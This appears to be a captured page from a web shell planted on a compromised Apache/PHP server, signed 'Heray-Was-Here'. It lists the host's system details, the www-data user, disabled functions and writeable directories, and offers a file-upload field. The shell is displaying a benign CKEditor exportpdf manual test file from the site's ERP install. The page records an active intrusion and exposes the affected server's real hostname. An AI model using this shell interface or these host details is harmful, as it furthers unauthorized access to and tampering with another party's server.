Heray-Was-Here
Server : Apache
System : Linux mail.lomejor.cr 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
Directory :  /var/www/erp/htdocs/includes/ckeditor/ckeditor/plugins/exportpdf/tests/manual/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/erp/htdocs/includes/ckeditor/ckeditor/plugins/exportpdf/tests/manual/stylesheets.html
<h2>Classic Editor</h2>
<textarea id="editor1">
	<span class="badge badge-success">Classic Editor</span>
</textarea>

<h2>Divarea Editor</h2>
<div id="editor2">
	<span class="badge badge-success">Divarea Editor</span>
</div>

<h2>Inline Editor</h2>
<div id="editor3" contenteditable="true">
	<span class="badge badge-success">Inline Editor</span>
</div>

<script>
	exportPdfUtils.initManualTest();

	CKEDITOR.replace( 'editor1', exportPdfUtils.getDefaultConfig( 'manual', {
		exportPdf_stylesheets: [ 'https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css' ],
		extraPlugins: 'wysiwygarea,exportpdf',
		allowedContent: true
	} ) );

	CKEDITOR.replace( 'editor2', exportPdfUtils.getDefaultConfig( 'manual', {
		exportPdf_stylesheets: [ 'https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css' ],
		extraPlugins: 'divarea,exportpdf',
		allowedContent: true
	} ) );

	CKEDITOR.inline( 'editor3', exportPdfUtils.getDefaultConfig( 'manual', {
		exportPdf_stylesheets: [ 'https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css' ],
		extraPlugins: 'floatingspace,exportpdf',
		allowedContent: true
	} ) );
</script>

Hry